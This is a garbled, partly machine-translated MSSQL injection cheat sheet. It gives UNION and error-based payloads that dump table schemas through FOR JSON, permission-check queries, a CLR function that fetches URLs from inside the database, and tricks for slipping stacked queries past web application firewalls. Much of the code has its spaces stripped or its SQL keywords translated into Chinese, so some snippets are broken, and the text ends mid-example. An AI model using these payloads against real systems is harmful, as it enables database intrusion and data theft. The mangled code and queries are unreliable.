defget_sid(n):domain ='0x0105000000000005150000001c00d1bcd181f1492bdfc236'user = struct.pack('<I', int(n))user = user.hex()returnf"{domain}{user}"#if n=1000, get SID of the user with ID 1000
替代错误注入向量
错误注入通常类似于构造,如 +AND+1=@@version-- 和基于«OR»运算符的变体。包含这些表达式的查询通常会被 Web 应用防火墙(WAF)阻止。为了绕过阻止,可以使用 %2b 字符与触发所需数据类型转换错误的特定函数调用的结果连接字符串。
# Checkif you have itSELECT*FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='VIEW SERVER STATE';# Or doingUsemaster;EXEC sp_helprotect 'fn_xe_file_target_read_file';
# Checkif you have itSELECT*FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='CONTROL SERVER';# Or doingUsemaster;EXEC sp_helprotect 'fn_get_audit_file';
# Checkif you have itSELECT*FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='CONTROL SERVER';# Or doingUsemaster;EXEC sp_helprotect 'fn_trace_gettabe';
创建一个 CLR UDF (Common Language Runtime User Defined Function),这是用任何 .NET 语言编写的代码,并编译成 DLL,在 MSSQL 中加载以执行自定义函数的过程需要 dbo 访问权限。这意味着通常只有在数据库连接为 sa 或具有管理员角色时才可行。
在 此 Github 存储库 中提供了一个 Visual Studio 项目和安装说明,以便将二进制文件加载到 MSSQL 中作为 CLR 组件,从而实现在 MSSQL 中执行 HTTP GET 请求。
这种功能的核心包含在 http.cs 文件中,该文件使用 WebClient 类执行 GET 请求并检索内容,如下所示:
usingSystem.Data.SqlTypes;usingSystem.Net;publicpartialclassUserDefinedFunctions{[Microsoft.SqlServer.Server.SqlFunction]publicstaticSqlStringhttp(SqlString url){var wc =newWebClient();var html =wc.DownloadString(url.Value);returnnewSqlString(html);}}
在执行CREATE ASSEMBLY SQL命令之前,建议运行以下SQL片段将程序集的SHA512哈希添加到服务器的受信任程序集列表中(可通过select * from sys.trusted_assemblies;查看):
提取表的全部内容的简洁方法涉及使用 FOR JSON 子句。这种方法比使用 FOR XML 子句更简洁,后者需要像 "raw" 这样的特定模式。FOR JSON 子句因其简洁性而受到青睐。
以下是如何从当前数据库中检索模式、表和列的方法:
https://vuln.app/getItem?id=-1'+union+select+null,concat_ws(0x3a,table_schema,table_name,column_name),null+from+information_schema.columns+for+json+auto--In situations where error-based vectors are used, it's crucial to provide an alias or a name. This is because the output of expressions, ifnot provided with either, cannot be formatted asJSON. Here's an example of how this is done:```sqlhttps://vuln.app/getItem?id=1'+并且+1=(选择+concat_ws(0x3a,table_schema,table_name,column_name)a+从+information_schema.columns+for+json+auto)--
For users granted the VIEW SERVER STATE permission on the server, it's possible to see all executing sessions on the SQL Server instance. However, without this permission, users can only view their current session. The currently executing SQL query can be retrieved by accessing sys.dm_exec_requests and sys.dm_exec_sql_text:
To check if you have the VIEW SERVER STATE permission, the following query can be used:
```sql
```sql
SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='VIEW SERVER STATE';
SELECT*FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='VIEW SERVER STATE';
## **Little tricks for WAF bypasses**
[Tricks also from here](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)
Non-standard whitespace characters: %C2%85 или %C2%A0:
### WAF Bypass with unorthodox stacked queries
According to [**this blog post**](https://www.gosecure.net/blog/2023/06/21/aws-waf-clients-left-vulnerable-to-sql-injection-due-to-unorthodox-mssql-design-choice/) it's possible to stack queries in MSSQL without using ";":
```sql
```sql
SELECT 'a' SELECT 'b'
SELECT'a'SELECT'b'
So for example, multiple queries such as:
```sql
```sql
使用 [tempdb]
创建表 [test] ([id] int)
插入 [test] 值(1)
选择 [id] 从 [test]
删除表[test]
Can be reduced to:
```sql
使用[tempdb]创建表[test]([id]int)插入[test]值(1)选择[id]从[test]删除表[test]
Therefore it could be possible to bypass different WAFs that doesn't consider this form of stacking queries. For example: